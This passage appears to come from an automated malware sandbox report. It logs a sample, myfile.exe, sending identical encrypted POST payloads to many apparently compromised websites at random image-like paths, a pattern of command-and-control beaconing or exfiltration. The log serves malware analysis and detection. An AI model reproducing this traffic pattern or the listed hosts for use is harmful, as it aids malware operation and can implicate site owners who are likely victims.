                                                              2024-09-09 10:07:42 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:42 UTC741INHTTP/1.1 405 Method Not Allowed
                                                              Date: Mon, 09 Sep 2024 10:07:42 GMT
                                                              Content-Length: 0
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              referrer-policy: strict-origin-when-cross-origin
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fovEeF%2BTUy0dC4L1wIdC5zip%2B0qF855myAIrSu8bpKjZoEG3dBHWBJB0rcNqDFibkGIAhjzry7uUPpvnk980ZeIHTXSbmysRBS2BQO7SRUowbxrPWOq7s8eH5UjHON2EYdc%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Vary: Accept-Encoding
                                                              CF-Cache-Status: DYNAMIC
                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                              X-Content-Type-Options: nosniff
                                                              Server: cloudflare
                                                              CF-RAY: 8c065f71acde32e2-EWR
                                                              alt-svc: h3=":443"; ma=86400


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              29192.168.2.449767141.95.251.1574437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:43 UTC282OUTPOST /news/pictures/numjznnuau.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: stage-infirmier.fr
                                                              2024-09-09 10:07:43 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:43 UTC166INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:43 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 146
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              2024-09-09 10:07:43 UTC146INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              30192.168.2.44976935.214.166.1934437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:44 UTC284OUTPOST /wp-content/game/doiathwnvkwf.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: mieleshopping.it
                                                              2024-09-09 10:07:44 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:44 UTC317INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:44 GMT
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Content-Length: 269
                                                              Connection: close
                                                              Location: https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gif
                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                              X-Proxy-Cache-Info: DT:1
                                                              2024-09-09 10:07:44 UTC269INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 65 6c 65 73 68 6f 70 70 69 6e 67 2e 69 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 67 61 6d 65 2f 64 6f 69 61 74 68 77 6e 76 6b 77 66 2e 67 69 66 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mieleshopping.it/wp-content/game/doiathwnvkwf.gif">here</a>.</p><


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              31192.168.2.44977035.214.166.1934437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:46 UTC226OUTGET /wp-content/game/doiathwnvkwf.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: www.mieleshopping.it
                                                              2024-09-09 10:07:47 UTC494INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:47 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              X-Cache-Enabled: True
                                                              Link: <https://www.mieleshopping.it/wp-json/>; rel="https://api.w.org/"
                                                              X-Httpd: 1
                                                              Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                              X-Proxy-Cache: MISS
                                                              X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                              2024-09-09 10:07:47 UTC15890INData Raw: 66 64 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 20 63 6c 61 73 73 3d 22 6c 6f 61 64 69 6e 67 2d 73 69 74 65 20 6e 6f 2d 6a 73 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 65 6c 65 73 68 6f 70 70 69 6e 67 2e 69 74 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 0a 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69
                                                              Data Ascii: fd19<!DOCTYPE html><html lang="it-IT" class="loading-site no-js"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="https://www.mieleshopping.it/xmlrpc.php"><script type="text/javascri


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              32192.168.2.449771109.237.132.564437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:49 UTC269OUTPOST /data/assets/hxdtlt.gif HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: holocine.de
                                                              2024-09-09 10:07:49 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:51 UTC368INHTTP/1.1 404 Not Found
                                                              Date: Mon, 09 Sep 2024 10:07:49 GMT
                                                              Server: Apache
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://holocine.de/wp-json/>; rel="https://api.w.org/"
                                                              Strict-Transport-Security: max-age=31556926
                                                              Connection: close
                                                              Transfer-Encoding: chunked
                                                              Content-Type: text/html; charset=UTF-8
                                                              2024-09-09 10:07:51 UTC6INData Raw: 63 63 37 32 0d 0a
                                                              Data Ascii: cc72


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              33192.168.2.44977280.158.2.414437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:52 UTC286OUTPOST /wp-content/pictures/vuvqcuzorejq.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: oscommunity.de
                                                              2024-09-09 10:07:52 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:53 UTC319INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:53 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Content-Length: 0
                                                              Connection: close
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Location: http://stayblue.basecom.eu
                                                              X-Powered-By: PleskLin


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              34192.168.2.44977335.214.211.2394437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:54 UTC274OUTPOST /wp-content/temp/wkeqlpss.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: bundan.com
                                                              2024-09-09 10:07:54 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:55 UTC433INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:55 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://www.bundan.com/wp-json/>; rel="https://api.w.org/"
                                                              X-Httpd: 1
                                                              Host-Header: 8441280b0c35cbc1147f8ba998a563a7
                                                              X-Proxy-Cache-Info: DT:1
                                                              2024-09-09 10:07:55 UTC15951INData Raw: 66 65 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 69 74 2d 49 54 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6e 64 61 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74
                                                              Data Ascii: feca<!DOCTYPE html><html lang="it-IT"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://www.bundan.com/xmlrpc.php" /><script type="text/javascript">document.documentElement


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              35192.168.2.449774185.15.78.1864437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:56 UTC284OUTPOST /news/temp/wpuatzictpgv.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: hostaletdelsindians.es
                                                              2024-09-09 10:07:56 UTC876OUTData Raw: 56 4a 05 22 52 2f 03 82 d8 21 a1 04 60 7d 87 f6 f4 92 57 c0 12 dc b1 33 45 22 e4 c1 a3 a3 4d cc 1e 1a f3 e4 f6 0e a4 eb 2b cc 27 41 38 29 7a 8d f2 87 44 af 3e fe b3 6f e9 33 18 4e 13 4f 77 8d 1c 34 fb 81 c0 cd c5 d2 6a 78 e2 b2 95 07 df 3a 79 2c e0 83 d9 0e cd 01 87 4c e8 2c a9 51 07 45 5e 21 f9 fc ad a2 59 58 b8 13 46 24 3d 21 dc dd e1 0a d6 fe 20 b7 2f 09 7b 34 76 0c 7f 33 82 2e 60 af 0b d1 68 37 6d d7 c3 93 c6 c2 c6 c8 1d db 5c 0c 07 42 64 2e 87 20 5d a2 1b fa 2a 58 91 c3 d7 a9 74 2c 9b d5 80 65 7c 1f 92 a1 22 72 5a 94 8d 86 f6 ee a2 cf 56 fe d3 62 9a 2b ca af 39 63 99 59 1f 41 f9 30 36 8f 83 d8 1f 94 fd b1 ea 18 1d 8e 21 9d d8 ae 05 0e 89 f5 ce 81 27 4a 2b e4 06 17 c0 87 45 0d 20 82 1a c3 7e 50 a6 bd f4 a7 c3 74 58 a4 37 cb 24 6e 58 a0 68 bc b9 63 23
                                                              Data Ascii: VJ"R/!`}W3E"M+'A8)zD>o3NOw4jx:y,L,QE^!YXF$=! /{4v3.`h7m\Bd. ]*Xt,e|"rZVb+9cYA06!'J+E ~PtX7$nXhc#
                                                              2024-09-09 10:07:56 UTC224INHTTP/1.1 301 Moved Permanently
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 162
                                                              Connection: close
                                                              Location: https://www.hostaletdelsindians.es/news/temp/wpuatzictpgv.jpg
                                                              2024-09-09 10:07:56 UTC162INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              36192.168.2.449775185.15.78.1864437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:58 UTC226OUTGET /news/temp/wpuatzictpgv.jpg HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Host: www.hostaletdelsindians.es
                                                              2024-09-09 10:07:59 UTC659INHTTP/1.1 404 Not Found
                                                              Server: nginx
                                                              Date: Mon, 09 Sep 2024 10:07:57 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              X-Powered-By: PHP/7.4.33
                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                              Link: <https://www.hostaletdelsindians.es/wp-json/>; rel="https://api.w.org/"
                                                              Set-Cookie: zqwa_uQECbpt=7mTe2o%2A_SgNr; expires=Tue, 10-Sep-2024 10:07:57 GMT; Max-Age=86400; path=/; secure
                                                              Set-Cookie: wXaScyxWbh=0%5B%2AH5P1SW; expires=Tue, 10-Sep-2024 10:07:57 GMT; Max-Age=86400; path=/; secure
                                                              Vary: Accept-Encoding
                                                              Server-Optimized-By: La Tecla
                                                              2024-09-09 10:07:59 UTC15725INData Raw: 31 64 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 5f 73 74 72 65 74 63 68 65 64 20 72 65 73 70 6f 6e 73 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 61 63 74 69 76 65 20 61 76 2d 70 72 65 6c 6f 61 64 65 72 2d 65 6e 61 62 6c 65 64 20 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 74 6f 70 20 68 74 6d 6c 5f 6c 6f 67 6f 5f 63 65 6e 74 65 72 20 68 74 6d 6c 5f 62 6f 74 74 6f 6d 5f 6e 61 76 5f 68 65 61 64 65 72 20 68 74 6d 6c 5f 6d 65 6e 75 5f 72 69 67 68 74 20 68 74 6d 6c 5f 63 75 73 74 6f 6d 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 74 69 63 6b 79 20 68 74 6d 6c 5f 68 65 61 64 65 72 5f 73 68 72 69 6e 6b 69 6e 67 5f 64 69 73 61 62 6c 65 64 20 68 74 6d 6c 5f 68 65 61
                                                              Data Ascii: 1d9f<!DOCTYPE html><html lang="es" class="html_stretched responsive av-preloader-active av-preloader-enabled html_header_top html_logo_center html_bottom_nav_header html_menu_right html_custom html_header_sticky html_header_shrinking_disabled html_hea


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              37192.168.2.449776198.185.159.1454437156C:\Users\user\Desktop\myfile.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-09-09 10:07:59 UTC284OUTPOST /content/assets/jlbaveucagau.png HTTP/1.1
                                                              Cache-Control: no-cache
                                                              Connection: close
                                                              Pragma: no-cache
                                                              Content-Type: application/octet-stream
                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0
                                                              Content-Length: 876
                                                              Host: almamidwifery.com
